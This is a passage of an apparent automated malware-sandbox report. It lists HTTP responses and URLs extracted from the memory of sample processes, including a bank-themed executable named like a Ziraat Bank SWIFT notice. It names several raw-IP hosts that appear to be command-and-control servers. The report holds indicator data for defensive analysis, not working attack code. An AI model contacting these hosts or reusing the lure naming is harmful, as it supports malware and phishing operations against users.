49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 21 Mar 2025 14:10:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 21 Mar 2025 14:10:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Fri, 21 Mar 2025 14:10:47 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Source: niellist.exe, 00000011.00000002.1411628662.0000000000B15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.21
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/
Source: niellist.exe, 00000003.00000002.1298601630.0000000000D07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/2X
Source: alg.exe, 00000002.00000003.1340496189.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/2m
Source: alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/bspqodujb
Source: alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/bspqodujbngs
Source: niellist.exe, 00000003.00000002.1298601630.0000000000D07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/eri
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/qnwbdottpdjvb
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/qnwbdottpdjvb588
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/qnwbdottpdjvbs
Source: alg.exe, 00000002.00000003.1339720537.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340849614.00000000004FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/twetxppkkq
Source: alg.exe, 00000002.00000003.1339720537.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1558654635.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1770492535.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1346185101.00000000004F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/twetxppkkqVt
Source: niellist.exe, 00000003.00000002.1294142638.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, niellist.exe, 00000003.00000002.1298601630.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/woywqgxcq
Source: alg.exe, 00000002.00000003.1300228185.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196:80/bspqodujb~vZ
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196:80/qnwbdottpdjvbY
Source: alg.exe, 00000002.00000003.1558654635.0000000000513000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340849614.0000000000513000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196:80/twetxppkkq
Source: niellist.exe, 00000003.00000002.1298601630.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196:80/woywqgxcq
Source: alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/
Source: alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/12
Source: alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/12E
Source: alg.exe, 00000002.00000003.1312913508.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1314920250.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/buysxojjpcbe
Source: alg.exe, 00000002.00000003.1313095660.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57:80/buysxojjpcbeP
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, niellist.exe, 00000003.00000002.1293879138.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, niellist.exe, 00000011.00000002.1410876293.0000000000A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/Ad
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/DM
Source: alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/E
Source: alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/a
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1273923400.0000000000D75000.00000040.00000020.00020000.00000000.sdmp, Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/ahfjecsqgekcwio
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1273923400.0000000000D75000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/ahfjecsqgekcwioro
Source: alg.exe, 00000002.00000003.1307290100.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1312913508.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1314920250.00000000004F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/arkfkq
Source: niellist.exe, 00000003.00000002.1298601630.0000000000CF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/bwejhhjeahxfje
Source: alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/oqcvpoewhl
Source: alg.exe, 00000002.00000003.1279607006.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/oqcvpoewhl-v
Source: alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/rkfkq
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239:80/ahfjecsqgekcwio
Source: alg.exe, 00000002.00000003.1307088264.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239:80/arkfkq
Source: alg.exe, 00000002.00000003.1280251410.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239:80/oqcvpoewhl
Source: alg.exe, 00000002.00000003.1559227442.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1986704664.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1322367769.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340496189.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23/uhxgrttve
Source: alg.exe, 00000002.00000003.1322367769.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1986704664.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1559227442.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340496189.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23:80/uhxgrttve
Source: alg.exe, 00000002.00000003.1771772723.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/
Source: alg.exe, 00000002.00000003.1986704664.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/J
Source: alg.exe, 00000002.00000003.1986704664.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/a
Source: alg.exe, 00000002.00000003.1559227442.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/gs
Source: alg.exe, 00000002.00000003.1770492535.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/iljywase
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/iljywasehv
Source: alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/kkjhdthfjo
Source: alg.exe, 00000002.00000003.1558654635.0000000000513000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/kkjhdthfjouemm1$
Source: alg.exe, 00000002.00000003.1987338757.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/qlbvcaqfgtptt
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/qlbvcaqfgtpttqtS
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/iljywase
Source: alg.exe, 00000002.00000003.1558654635.0000000000513000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/kkjhdthfjoP
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/qlbvcaqfgtpttcrobat
Source: powershell.exe, 0000000E.00000002.1464480139.000001FEBE977000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microskW
Source: powershell.exe, 0000000E.00000002.1464480139.000001FEBE90C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: powershell.exe, 0000000E.00000002.1437482472.000001FEB6143000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: niellist.exe, 00000003.00000002.1293879138.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pywolwnvd.biz/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 0000000E.00000002.1397307978.000001FEA62FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: XClient.exe, 0000000B.00000002.2539294552.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1397307978.000001FEA60D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD84481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: powershell.exe, 0000000E.00000002.1397307978.000001FEA62FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/0
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
